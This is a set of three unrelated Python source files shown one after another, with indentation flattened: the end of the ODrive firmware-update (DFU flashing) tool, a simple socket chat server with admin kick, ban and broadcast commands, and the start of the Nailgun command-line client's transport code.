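# Illustrative sketch (not part of the original tool): how the ordering defined by
# is_newer()/__gt__ above treats prerelease builds, given the (major, minor, revision,
# prerelease) layout of fw_version. The version numbers below are made up.
def _firmware_ordering_example():
    release = Firmware()
    release.fw_version = (0, 4, 1, False)      # release build
    prerelease = Firmware()
    prerelease.fw_version = (0, 4, 1, True)    # same number, marked as prerelease
    # With equal version numbers, the release compares as newer than the prerelease.
    return release > prerelease                # True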
class FirmwareFromGithub(Firmware):
"""
Represents a firmware asset
"""
def __init__(self, release_json, asset_json):
Firmware.__init__(self)
if release_json['draft'] or release_json['prerelease']:
release_json['tag_name'] += "*"
self.fw_version = odrive.version.version_str_to_tuple(release_json['tag_name'])
hw_version_regex = r'.*v([0-9]+).([0-9]+)(-(?P<voltage>[0-9]+)V)?.hex'
hw_version_match = re.search(hw_version_regex, asset_json['name'])
self.hw_version = (int(hw_version_match[1]),
int(hw_version_match[2]),
int(hw_version_match.groupdict().get('voltage') or 0))
self.github_asset_id = asset_json['id']
self.hex = None
# no technical reason to fetch this - just interesting
self.download_count = asset_json['download_count']
def get_as_hex(self):
"""
Returns the content of the firmware in as a binary array in Intel Hex format
"""
if self.hex is None:
print("Downloading firmware {}...".format(get_fw_version_string(self.fw_version)))
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases/assets/' + str(self.github_asset_id),
headers={'Accept': 'application/octet-stream'})
if response.status_code != 200:
raise Exception("failed to download firmware")
self.hex = response.content
return io.StringIO(self.hex.decode('utf-8'))
class FirmwareFromFile(Firmware):
def __init__(self, file):
Firmware.__init__(self)
self._file = file
def get_as_hex(self):
return self._file
def get_all_github_firmwares():
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases')
if response.status_code != 200:
raise Exception("could not fetch releases")
response_json = response.json()
for release_json in response_json:
for asset_json in release_json['assets']:
try:
if asset_json['name'].lower().endswith('.hex'):
fw = FirmwareFromGithub(release_json, asset_json)
yield fw
except Exception as ex:
print(ex)
def get_newest_firmware(hw_version):
"""
Returns the newest available firmware for the specified hardware version
"""
firmwares = get_all_github_firmwares()
firmwares = filter(lambda fw: not fw.fw_version[3], firmwares) # ignore prereleases
firmwares = filter(lambda fw: fw.hw_version == hw_version, firmwares)
firmwares = list(firmwares)
firmwares.sort()
return firmwares[-1] if len(firmwares) else None
def show_deferred_message(message, cancellation_token):
"""
    Shows a message after about 10 seconds, unless cancellation_token gets set.
"""
def show_message_thread(message, cancellation_token):
for _ in range(1,10):
if cancellation_token.is_set():
return
time.sleep(1)
if not cancellation_token.is_set():
print(message)
t = threading.Thread(target=show_message_thread, args=(message, cancellation_token))
t.daemon = True
t.start()
def put_into_dfu_mode(device, cancellation_token):
"""
Puts the specified device into DFU mode
"""
if not hasattr(device, "enter_dfu_mode"):
print("The firmware on device {} cannot soft enter DFU mode.\n"
"Please remove power, put the DFU switch into DFU mode,\n"
"then apply power again. Then try again.\n"
"If it still doesn't work, you can try to use the DeFuse app or \n"
"dfu-util, see the odrive documentation.\n"
"You can also flash the firmware using STLink (`make flash`)"
.format(device.__channel__.usb_device.serial_number))
return
print("Putting device {} into DFU mode...".format(device.__channel__.usb_device.serial_number))
try:
device.enter_dfu_mode()
except fibre.ChannelBrokenException:
pass # this is expected because the device reboots
if platform.system() == "Windows":
show_deferred_message("Still waiting for the device to reappear.\n"
"Use the Zadig utility to set the driver of 'STM32 BOOTLOADER' to libusb-win32.",
cancellation_token)
def find_device_in_dfu_mode(serial_number, cancellation_token):
"""
Polls libusb until a device in DFU mode is found
"""
while not cancellation_token.is_set():
        params = {} if serial_number is None else {'serial_number': serial_number}
stm_device = usb.core.find(idVendor=0x0483, idProduct=0xdf11, **params)
        if stm_device is not None:
return stm_device
time.sleep(1)
return None
def update_device(device, firmware, logger, cancellation_token):
"""
Updates the specified device with the specified firmware.
The device passed to this function can either be in
normal mode or in DFU mode.
The firmware should be an instance of Firmware or None.
If firmware is None, the newest firmware for the device is
downloaded from GitHub releases.
"""
if isinstance(device, usb.core.Device):
serial_number = device.serial_number
dfudev = DfuDevice(device)
if (logger._verbose):
logger.debug("OTP:")
dump_otp(dfudev)
# Read hardware version from one-time-programmable memory
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
otp_data = dfudev.read_sector(otp_sector)
if otp_data[0] == 0:
otp_data = otp_data[16:]
if otp_data[0] == 0xfe:
hw_version = (otp_data[3], otp_data[4], otp_data[5])
else:
hw_version = (0, 0, 0)
else:
serial_number = device.__channel__.usb_device.serial_number
dfudev = None
# Read hardware version as reported from firmware
hw_version_major = device.hw_version_major if hasattr(device, 'hw_version_major') else 0
hw_version_minor = device.hw_version_minor if hasattr(device, 'hw_version_minor') else 0
hw_version_variant = device.hw_version_variant if hasattr(device, 'hw_version_variant') else 0
hw_version = (hw_version_major, hw_version_minor, hw_version_variant)
if hw_version < (3, 5, 0):
print(" DFU mode is not supported on board version 3.4 or earlier.")
print(" This is because entering DFU mode on such a device would")
print(" break the brake resistor FETs under some circumstances.")
print("Warning: DFU mode is not supported on ODrives earlier than v3.5 unless you perform a hardware mod.")
if not odrive.utils.yes_no_prompt("Do you still want to continue?", False):
raise OperationAbortedException()
fw_version_major = device.fw_version_major if hasattr(device, 'fw_version_major') else 0
fw_version_minor = device.fw_version_minor if hasattr(device, 'fw_version_minor') else 0
fw_version_revision = device.fw_version_revision if hasattr(device, 'fw_version_revision') else 0
fw_version_prerelease = device.fw_version_prerelease if hasattr(device, 'fw_version_prerelease') else True
fw_version = (fw_version_major, fw_version_minor, fw_version_revision, fw_version_prerelease)
print("Found ODrive {} ({}) with firmware {}{}".format(
serial_number,
get_hw_version_string(hw_version),
get_fw_version_string(fw_version),
" in DFU mode" if dfudev is not None else ""))
if firmware is None:
if hw_version == (0, 0, 0):
if dfudev is None:
suggestion = 'You have to manually flash an up-to-date firmware to make automatic checks work. Run `odrivetool dfu --help` for more info.'
else:
suggestion = 'Run "make write_otp" to program the board version.'
raise Exception('Cannot check online for new firmware because the board version is unknown. ' + suggestion)
print("Checking online for newest firmware...", end='')
firmware = get_newest_firmware(hw_version)
if firmware is None:
raise Exception("could not find any firmware release for this board version")
print(" found {}".format(get_fw_version_string(firmware.fw_version)))
if firmware.fw_version <= fw_version:
print()
if firmware.fw_version < fw_version:
print("Warning: you are about to flash firmware {} which is older than the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
else:
print("You are about to flash firmware {} which is the same version as the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
if not odrive.utils.yes_no_prompt("Do you want to flash this firmware anyway?", False):
raise OperationAbortedException()
# load hex file
# TODO: Either use the elf format or pack a custom format with a manifest.
# This way we can for instance verify the target board version and only
# have to publish one file for every board (instead of elf AND hex files).
hexfile = IntelHex(firmware.get_as_hex())
logger.debug("Contiguous segments in hex file:")
for start, end in hexfile.segments():
logger.debug(" {:08X} to {:08X}".format(start, end - 1))
# Back up configuration
    do_backup_config = False
    if dfudev is None:
do_backup_config = device.user_config_loaded if hasattr(device, 'user_config_loaded') else False
if do_backup_config:
odrive.configuration.backup_config(device, None, logger)
elif not odrive.utils.yes_no_prompt("The configuration cannot be backed up because the device is already in DFU mode. The configuration may be lost after updating. Do you want to continue anyway?", True):
raise OperationAbortedException()
# Put the device into DFU mode if it's not already in DFU mode
if dfudev is None:
find_odrive_cancellation_token = Event(cancellation_token)
put_into_dfu_mode(device, find_odrive_cancellation_token)
stm_device = find_device_in_dfu_mode(serial_number, cancellation_token)
find_odrive_cancellation_token.set()
dfudev = DfuDevice(stm_device)
logger.debug("Sectors on device: ")
for sector in dfudev.sectors:
logger.debug(" {:08X} to {:08X} ({})".format(
sector['addr'],
sector['addr'] + sector['len'] - 1,
sector['name']))
# fill sectors with data
touched_sectors = list(populate_sectors(dfudev.sectors, hexfile))
logger.debug("The following sectors will be flashed: ")
for sector,_ in touched_sectors:
logger.debug(" {:08X} to {:08X}".format(sector['addr'], sector['addr'] + sector['len'] - 1))
# Erase
try:
for i, (sector, data) in enumerate(touched_sectors):
print("Erasing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
dfudev.erase_sector(sector)
print('Erasing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Flash
try:
for i, (sector, data) in enumerate(touched_sectors):
print("Flashing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
dfudev.write_sector(sector, data)
print('Flashing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Verify
try:
for i, (sector, expected_data) in enumerate(touched_sectors):
print("Verifying... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
observed_data = dfudev.read_sector(sector)
mismatch_pos = get_first_mismatch_index(observed_data, expected_data)
            if mismatch_pos is not None:
mismatch_pos -= mismatch_pos % 16
observed_snippet = ' '.join('{:02X}'.format(x) for x in observed_data[mismatch_pos:mismatch_pos+16])
expected_snippet = ' '.join('{:02X}'.format(x) for x in expected_data[mismatch_pos:mismatch_pos+16])
raise RuntimeError("Verification failed around address 0x{:08X}:\n".format(sector['addr'] + mismatch_pos) +
" expected: " + expected_snippet + "\n"
" observed: " + observed_snippet)
print('Verifying... done \r', end='', flush=True)
finally:
print('', flush=True)
# If the flash operation failed for some reason, your device is bricked now.
# You can unbrick it as long as the device remains powered on.
# (or always with an STLink)
# So for debugging you should comment this last part out.
# Jump to application
dfudev.jump_to_application(0x08000000)
logger.info("Waiting for the device to reappear...")
device = odrive.find_any("usb", serial_number,
cancellation_token, cancellation_token, timeout=30)
if do_backup_config:
odrive.configuration.restore_config(device, None, logger)
os.remove(odrive.configuration.get_temp_config_filename(device))
logger.success("Device firmware update successful.")
def launch_dfu(args, logger, cancellation_token):
"""
Waits for a device that matches args.path and args.serial_number
and then upgrades the device's firmware.
"""
serial_number = args.serial_number
find_odrive_cancellation_token = Event(cancellation_token)
logger.info("Waiting for ODrive...")
devices = [None, None]
# Start background thread to scan for ODrives in DFU mode
def find_device_in_dfu_mode_thread():
devices[0] = find_device_in_dfu_mode(serial_number, find_odrive_cancellation_token)
find_odrive_cancellation_token.set()
t = threading.Thread(target=find_device_in_dfu_mode_thread)
t.daemon = True
t.start()
# Scan for ODrives not in DFU mode
# We only scan on USB because DFU is only implemented over USB
devices[1] = odrive.find_any("usb", serial_number,
find_odrive_cancellation_token, cancellation_token)
find_odrive_cancellation_token.set()
device = devices[0] or devices[1]
firmware = FirmwareFromFile(args.file) if args.file else None
update_device(device, firmware, logger, cancellation_token)
# Note: the flashed image can be verified using: (0x12000 is the number of bytes to read)
# $ openocd -f interface/stlink-v2.cfg -f target/stm32f4x.cfg -c init -c flash\ read_bank\ 0\ image.bin\ 0\ 0x12000 -c exit
# $ hexdump -C image.bin > image.bin.txt
#
# If you compare this with a reference image that was flashed with the STLink, you will see
# minor differences. This is because this script fills undefined sections with 0xff.
# $ diff image_ref.bin.txt image.bin.txt
# 21c21
# < *
# ---
# > 00000180 d9 47 00 08 d9 47 00 08 ff ff ff ff ff ff ff ff |.G...G..........|
# 2553c2553
# < 00009fc0 9e 46 70 47 00 00 00 00 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
# ---
# > 00009fc0 9e 46 70 47 ff ff ff ff 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
|
Server.py
|
import socket
import threading
import time
import re
import os
## SERVER SCRIPT
HEADER = 2048
DISCONNECT_MESSAGE = "!DISCONNECT"
FORMAT = "utf-8"
all_connected = []
all_address = []
all_username = []
all_message = []
blacklist = []
users = {
"USERNAME" : all_username,
"ADDRESS" : all_address
}
help = {
" Commands" : " Functions",
"/list connection" : " -> Display active connections to server",
"/list connection details" : " -> Display all IP addresses and their respective username",
"/kick [username] [True|False]" : " -> Kick or ban a specific user",
"/pm [username] [message]" : " -> Private message to specific user",
"/toall [message]" : " -> Public message to all users",
"/viewchat" : " -> View the conversation between users",
"/blacklist" : " -> Display all blacklisted mac addresses",
"/blacklist remove [all|IndexNumber]" : " -> Remove all or specific user from the blacklist",
"/kill [seconds]" : " -> Shut down the server in x seconds",
"/help" : " -> Display all commands and their functions",
"cls" : "-> Clear terminal screen",
"echo" : "-> Repeat after user input on terminal"
}
def bootup():
# set up interactive terminal
interactive = threading.Thread(target = interactBlock)
interactive.daemon = True
interactive.start()
server.listen()
print(f"[SERVER] Server listening on <{SERVER}:{PORT}> ....")
while True:
try:
conn, addr = server.accept()
thread = threading.Thread(target = handleClient, args= (conn,addr))
thread.daemon = True
thread.start()
except socket.error as e:
print("Accept request failed : "+ str(e))
def handleClient(conn, addr):
# receive mac address from client
mac_length = conn.recv(HEADER).decode(FORMAT)
mac = conn.recv(int(mac_length)).decode(FORMAT)
# check blacklisted or not
if mac in blacklist:
guard = f"\n[SERVER] You are banned from this server. For more enquiries, please contact the admin\n"
conn.send(guard.encode(FORMAT))
conn.send("!kick".encode(FORMAT))
else:
username_length = conn.recv(HEADER).decode(FORMAT)
username = conn.recv(int(username_length)).decode(FORMAT)
# record client details
all_connected.append(conn)
all_address.append(addr)
all_username.append(username)
print(f"[SERVER] New Connection {addr[0]}:{str(addr[1])} -> {username}",end ="\n>>> ")
conn.send("----------- Start Messaging Below -----------\n".encode(FORMAT))
connected = True
while connected:
try:
msg_length = conn.recv(HEADER).decode(FORMAT)
if int(msg_length) > 0:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
rmsg = f"[{username}] >>> {msg} \n"
if msg == "!DISCONNECT":
rmsg = f"[SERVER] {username} Disconnected... \n"
## remove user records
all_address.remove(addr)
all_connected.remove(conn)
all_username.remove(username)
## loop breaking
connected = False
## save the message to server
all_message.append(rmsg)
## compute length of message
# broadcast_length = str(len(rmsg.encode(FORMAT)))
for client in all_connected:
if client != conn:
client.send(rmsg.encode(FORMAT))
else:
# do nothing if empty message is sent from clients
continue
except:
break
# close client connection
# conn.send("!kill".encode(FORMAT))
# conn.close()
if mac not in blacklist:
print(f"[SERVER] {addr[0]}:{str(addr[1])} -> {username} Disconnected", end="\n>>> ")
def interactBlock():
while True:
cmd = input(">>> ")
# display total number of connections
if cmd == "/list connection":
print(f"[SERVER|ACTIVE CONNECTIONS] {len(all_connected)}")
# display IP and Username of each connection
elif cmd == "/list connection details":
print("\n{:<22} {:}".format("Address"," Username"))
for i in range(len(all_address)):
print("{:<22}-> {:}".format(all_address[i][0]+":"+str(all_address[i][1]),all_username[i]))
print("",end = "\n\n")
# kick or ban a user
elif cmd[:5] == "/kick":
try:
pattern = r"^/kick (.+) (True|False|true|false|t|f|T|F)$"
# check command syntax
if not (re.match(pattern,cmd)):
print("[Server] Argument is not legally filled")
else:
cmd = cmd.split(" ")
ban = cmd[-1]
cmd.pop()
cmd = " ".join(cmd)
target = cmd[6:]
# check existence of the user
if target not in all_username:
print(f"[SERVER] No such user called {target}")
else:
ind = all_username.index(target)
target_conn = all_connected[ind]
print(f"[SERVER] Will Kick {all_address[ind][0]}:{all_address[ind][1]} -> {all_username[ind]}")
reason = input("Reason >>> ")
response = f"[SERVER] You are kicked Reason: {reason}\n"
broad_response = f"[SERVER] {target} is kicked Reason: {reason}\n"
# send ban command and get mac address
if ban.lower() == "true" or ban.lower() == "t":
target_conn.send("!ban".encode(FORMAT))
mac = target_conn.recv(HEADER).decode(FORMAT)
blacklist.append(mac)
# send kick command
target_conn.send(response.encode(FORMAT))
time.sleep(1)
target_conn.send("!kick".encode(FORMAT))
# close the connection
target_conn.close()
all_address.remove(all_address[ind])
all_connected.remove(target_conn)
all_username.remove(target)
print(f"[SERVER] {target} has been kicked")
## message is not sent immediately
# save message to server
all_message.append(broad_response)
for client in all_connected:
client.send(broad_response.encode(FORMAT))
except Exception as e:
print("[SERVER] An unknown error occured\n"+e)
elif cmd[:3] == "/pm":
try:
username = cmd[4:]
if username in all_username:
msg = " ".join(cmd.split(" ")[2:])
package = f"[SERVER|ADMIN] >>> {msg} (DO NOT REPLY)\n"
saved = f"[SERVER|ADMIN] >>> {username} : {msg} (DO NOT REPLY)\n"
# save message to server
all_message.append(saved)
target_conn = all_connected[all_username.index(username)]
target_conn.send(package.encode(FORMAT))
print("[SERVER] Message is sent successfully")
else:
print(f"[SERVER] No such user called {username}")
except:
print("[SERVER] No such user is found in the database")
elif cmd[:6] == "/toall":
try:
msg = cmd[7:]
package = f"[SERVER|ADMIN] >>> {msg}\n"
# save message to server
all_message.append(package)
for client in all_connected:
client.send(package.encode(FORMAT))
print("[Server] Message is sent successfully")
except Exception as e:
print("[SERVER] Unknown error occured!\n"+e)
elif cmd == "/viewchat":
print("-------------- Message History --------------\n")
for message in all_message:
print(message)
print("\n---------------------------------------------",end="\n\n")
elif cmd[:5] == "/kill":
try:
sec = int(cmd[6:])
print(f"[SERVER] Server will shutdown in {sec} seconds, are you sure? y/N >>> ", end = "")
res = input("")
if res.upper() == "Y":
broadcast = " [SERVER] Server will shutdown in {sec} seconds \n"
all_message.append(broadcast)
for client in all_connected:
client.send(broadcast.encode(FORMAT))
time.sleep(sec)
broadcast = "[SERVER] Server shutting down..."
print(broadcast)
for client in all_connected:
client.close()
all_message.append(broadcast)
print("[SERVER] Clearing stored user information...")
all_connected.clear()
all_address.clear()
all_username.clear()
print("[SERVER] Done clearing user information...")
res = input("[SERVER] Press any key to exit...")
os._exit(0)
elif res.upper() == "N" or res == "":
print("[SERVER] Shut down procedure aborted")
else:
print("[SERVER] Unknown Command Inputted")
except Exception as e:
print("[Server] An unknown error occured\n"+str(e))
elif cmd == "/blacklist":
print(f"Number of blacklisted device : {str(len(blacklist))}")
print("List of mac addresses of the devices")
i = 1
for mac in blacklist:
print(f"{str(i)}. {mac}")
i += 1
print("",end="\n\n")
elif cmd[:17] == "/blacklist remove":
if len(blacklist) > 0:
cmd = cmd.split(" ")
# case where no user is specified
if len(cmd) == 2:
print("[SERVER] User to remove from blacklist is unspecified")
# case where all is inputted
elif cmd[-1] == "all":
print("[SERVER] This action will clear all data in blacklist. Are you sure? y/N",end = "\n>>> ")
res = input("")
while True:
if res.upper() == "Y":
print("[SERVER] Clearing blacklist...")
blacklist.clear()
print("[SERVER] Done.")
break
elif res.upper() == "N" or res == "":
print("[SERVER] Action aborted.")
break
else:
pass
res = input(">>> ")
else:
try:
ind = int(cmd[-1])
if ind > len(blacklist) or ind < 1:
print("[SERVER] Invalid index inputted")
else:
                            blacklist.pop(ind - 1)  # the /blacklist listing shown to the admin is 1-indexed
print("[SERVER] User specified is removed from blacklist.")
except ValueError:
print("[SERVER] The index entered must be a number")
                except Exception:
print("[SERVER] Unknown Command Inputted")
else:
print("[SERVER] The blacklist is empty...")
elif cmd == "/help":
print()
for k,v in help.items():
print("{:<38}{:}".format(k,v))
print("",end = "\n\n")
elif cmd == "cls":
os.system("cls")
elif cmd[:4] == "echo":
print(cmd[5:])
elif cmd == "":
continue
else:
print("[SERVER] Unknown Command Inputted")
#main
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print("[Client] Enter the IP and the port number of the host server")
print("Host IP : ")
SERVER = str(input(""))
print("Port : ")
PORT = int(input(""))
ADDR = (SERVER, PORT)
server.bind(ADDR)
print("[SERVER] Server is starting...")
bootup()
except:
print("Server setup failed. Press any key to exit")
input("")
|
ng.py
|
#!/usr/bin/env python
#
# Copyright 2004-2015, Martian Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import ctypes
import platform
import optparse
import os
import os.path
import tempfile
import select
import socket
import struct
import sys
from threading import Condition, Event, Thread, RLock
from subprocess import CalledProcessError, check_call
is_py2 = sys.version[0] == "2"
if is_py2:
import Queue as Queue
import __builtin__ as builtin
def to_bytes(s):
return s
else:
import queue as Queue
import builtins as builtin
from io import UnsupportedOperation
def to_bytes(s):
return bytes(s, "utf-8")
def bytes_to_str(bytes_to_convert):
"""Version independent way of converting bytes to string."""
return bytes_to_convert if is_py2 else bytes_to_convert.decode("utf-8")
# @author <a href="http://www.martiansoftware.com/contact.html">Marty Lamb</a>
# @author Pete Kirkham (Win32 port)
# @author Sergey Balabanov, Ben Hamilton (Python port)
#
# Please try to keep this working on Python 2.6.
NAILGUN_VERSION = "0.9.3"
BUFSIZE = 2048
NAILGUN_PORT_DEFAULT = 8212
CHUNK_HEADER_LEN = 5
THREAD_TERMINATION_TIMEOUT_SEC = 0.5
STDIN_BUFFER_LINE_SIZE = 10
CHUNKTYPE_STDIN = b"0"
CHUNKTYPE_STDOUT = b"1"
CHUNKTYPE_STDERR = b"2"
CHUNKTYPE_STDIN_EOF = b"."
CHUNKTYPE_ARG = b"A"
CHUNKTYPE_LONGARG = b"L"
CHUNKTYPE_ENV = b"E"
CHUNKTYPE_DIR = b"D"
CHUNKTYPE_CMD = b"C"
CHUNKTYPE_EXIT = b"X"
CHUNKTYPE_SENDINPUT = b"S"
CHUNKTYPE_HEARTBEAT = b"H"
NSEC_PER_SEC = 1000000000
DEFAULT_HEARTBEAT_INTERVAL_SEC = 0.5
SELECT_MAX_BLOCK_TIME_SEC = 1.0
SEND_THREAD_WAIT_TERMINATION_SEC = 5.0
# We need to support Python 2.6 hosts which lack memoryview().
HAS_MEMORYVIEW = "memoryview" in dir(builtin)
EVENT_STDIN_CHUNK = 0
EVENT_STDIN_CLOSED = 1
EVENT_STDIN_EXCEPTION = 2
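# Illustrative sketch (not part of the original client): the 5-byte chunk header used by
# this protocol is a big-endian 4-byte payload length followed by a 1-byte chunk type,
# matching the ">ic" format that struct.pack_into()/unpack_from() use further below.
def _example_chunk(payload, chunk_type=CHUNKTYPE_STDIN):
    # payload is expected to be a bytes object
    header = struct.pack(">ic", len(payload), chunk_type)
    return header + payload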
class NailgunException(Exception):
SOCKET_FAILED = 231
CONNECT_FAILED = 230
UNEXPECTED_CHUNKTYPE = 229
CONNECTION_BROKEN = 227
def __init__(self, message, code):
self.message = message
self.code = code
def __str__(self):
return self.message
class Transport(object):
def close(self):
raise NotImplementedError()
def sendall(self, data):
raise NotImplementedError()
def recv(self, size):
raise NotImplementedError()
def recv_into(self, buffer, size=None):
raise NotImplementedError()
def select(self, timeout_secs):
raise NotImplementedError()
class UnixTransport(Transport):
def __init__(self, __socket):
self.__socket = __socket
self.recv_flags = 0
self.send_flags = 0
if hasattr(socket, "MSG_WAITALL"):
self.recv_flags |= socket.MSG_WAITALL
if hasattr(socket, "MSG_NOSIGNAL"):
self.send_flags |= socket.MSG_NOSIGNAL
def close(self):
return self.__socket.close()
def sendall(self, data):
result = self.__socket.sendall(data, self.send_flags)
return result
def recv(self, nbytes):
return self.__socket.recv(nbytes, self.recv_flags)
def recv_into(self, buffer, nbytes=None):
return self.__socket.recv_into(buffer, nbytes, self.recv_flags)
def select(self, timeout_secs):
select_list = [self.__socket]
readable, _, exceptional = select.select(
select_list, [], select_list, timeout_secs
)
return (self.__socket in readable), (self.__socket in exceptional)
if os.name == "nt":
import ctypes.wintypes
wintypes = ctypes.wintypes
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_FLAG_OVERLAPPED = 0x40000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = ctypes.c_void_p(-1).value
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
WAIT_FAILED = 0xFFFFFFFF
WAIT_TIMEOUT = 0x00000102
WAIT_OBJECT_0 = 0x00000000
WAIT_IO_COMPLETION = 0x000000C0
INFINITE = 0xFFFFFFFF
# Overlapped I/O operation is in progress. (997)
ERROR_IO_PENDING = 0x000003E5
ERROR_PIPE_BUSY = 231
# The pointer size follows the architecture
# We use WPARAM since this type is already conditionally defined
ULONG_PTR = ctypes.wintypes.WPARAM
class OVERLAPPED(ctypes.Structure):
_fields_ = [
("Internal", ULONG_PTR),
("InternalHigh", ULONG_PTR),
("Offset", wintypes.DWORD),
("OffsetHigh", wintypes.DWORD),
("hEvent", wintypes.HANDLE),
]
LPDWORD = ctypes.POINTER(wintypes.DWORD)
CreateFile = ctypes.windll.kernel32.CreateFileW
CreateFile.argtypes = [
wintypes.LPCWSTR,
wintypes.DWORD,
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
wintypes.HANDLE,
]
CreateFile.restype = wintypes.HANDLE
CloseHandle = ctypes.windll.kernel32.CloseHandle
CloseHandle.argtypes = [wintypes.HANDLE]
CloseHandle.restype = wintypes.BOOL
ReadFile = ctypes.windll.kernel32.ReadFile
ReadFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
ReadFile.restype = wintypes.BOOL
WriteFile = ctypes.windll.kernel32.WriteFile
WriteFile.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
ctypes.POINTER(OVERLAPPED),
]
WriteFile.restype = wintypes.BOOL
GetLastError = ctypes.windll.kernel32.GetLastError
GetLastError.argtypes = []
GetLastError.restype = wintypes.DWORD
SetLastError = ctypes.windll.kernel32.SetLastError
SetLastError.argtypes = [wintypes.DWORD]
SetLastError.restype = None
FormatMessage = ctypes.windll.kernel32.FormatMessageW
FormatMessage.argtypes = [
wintypes.DWORD,
wintypes.LPVOID,
wintypes.DWORD,
wintypes.DWORD,
ctypes.POINTER(wintypes.LPCWSTR),
wintypes.DWORD,
wintypes.LPVOID,
]
FormatMessage.restype = wintypes.DWORD
LocalFree = ctypes.windll.kernel32.LocalFree
GetOverlappedResult = ctypes.windll.kernel32.GetOverlappedResult
GetOverlappedResult.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(OVERLAPPED),
LPDWORD,
wintypes.BOOL,
]
GetOverlappedResult.restype = wintypes.BOOL
CreateEvent = ctypes.windll.kernel32.CreateEventW
CreateEvent.argtypes = [LPDWORD, wintypes.BOOL, wintypes.BOOL, wintypes.LPCWSTR]
CreateEvent.restype = wintypes.HANDLE
PeekNamedPipe = ctypes.windll.kernel32.PeekNamedPipe
PeekNamedPipe.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
wintypes.DWORD,
LPDWORD,
LPDWORD,
LPDWORD,
]
PeekNamedPipe.restype = wintypes.BOOL
WaitNamedPipe = ctypes.windll.kernel32.WaitNamedPipeW
WaitNamedPipe.argtypes = [wintypes.LPCWSTR, wintypes.DWORD]
WaitNamedPipe.restype = wintypes.BOOL
def _win32_strerror(err):
""" expand a win32 error code into a human readable message """
# FormatMessage will allocate memory and assign it here
buf = ctypes.c_wchar_p()
FormatMessage(
FORMAT_MESSAGE_FROM_SYSTEM
| FORMAT_MESSAGE_ALLOCATE_BUFFER
| FORMAT_MESSAGE_IGNORE_INSERTS,
None,
err,
0,
buf,
0,
None,
)
try:
return buf.value
finally:
LocalFree(buf)
class WindowsNamedPipeTransport(Transport):
""" connect to a named pipe """
def __init__(self, sockpath):
self.sockpath = u"\\\\.\\pipe\\{0}".format(sockpath)
while True:
self.pipe = CreateFile(
self.sockpath,
GENERIC_READ | GENERIC_WRITE,
0,
None,
OPEN_EXISTING,
FILE_FLAG_OVERLAPPED,
None,
)
err1 = GetLastError()
msg = _win32_strerror(err1)
if self.pipe != INVALID_HANDLE_VALUE:
break
if err1 != ERROR_PIPE_BUSY:
self.pipe = None
raise NailgunException(msg, NailgunException.CONNECT_FAILED)
if not WaitNamedPipe(self.sockpath, 5000):
self.pipe = None
raise NailgunException(
"time out while waiting for a pipe", NailgunException.CONNECT_FAILED
)
# event for the overlapped I/O operations
self.read_waitable = CreateEvent(None, True, False, None)
if self.read_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
self.write_waitable = CreateEvent(None, True, False, None)
if self.write_waitable is None:
raise NailgunException(
"CreateEvent failed", NailgunException.CONNECT_FAILED
)
def _raise_win_err(self, msg, err):
raise IOError("%s win32 error code: %d %s" % (msg, err, _win32_strerror(err)))
def close(self):
if self.pipe:
CloseHandle(self.pipe)
self.pipe = None
if self.read_waitable is not None:
CloseHandle(self.read_waitable)
self.read_waitable = None
if self.write_waitable is not None:
CloseHandle(self.write_waitable)
self.write_waitable = None
def recv_into(self, buffer, nbytes):
# we don't use memoryview because OVERLAPPED I/O happens
# after the method (ReadFile) returns
buf = ctypes.create_string_buffer(nbytes)
olap = OVERLAPPED()
olap.hEvent = self.read_waitable
immediate = ReadFile(self.pipe, buf, nbytes, None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err("failed to read %d bytes" % nbytes, GetLastError())
nread = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nread, True):
err = GetLastError()
self._raise_win_err("error while waiting for read", err)
nread = nread.value
buffer[:nread] = buf[:nread]
return nread
def sendall(self, data):
olap = OVERLAPPED()
olap.hEvent = self.write_waitable
p = (ctypes.c_ubyte * len(data))(*(bytearray(data)))
immediate = WriteFile(self.pipe, p, len(data), None, olap)
if not immediate:
err = GetLastError()
if err != ERROR_IO_PENDING:
self._raise_win_err(
"failed to write %d bytes" % len(data), GetLastError()
)
# Obtain results, waiting if needed
nwrote = wintypes.DWORD()
if not GetOverlappedResult(self.pipe, olap, nwrote, True):
err = GetLastError()
self._raise_win_err("error while waiting for write", err)
nwrote = nwrote.value
if nwrote != len(data):
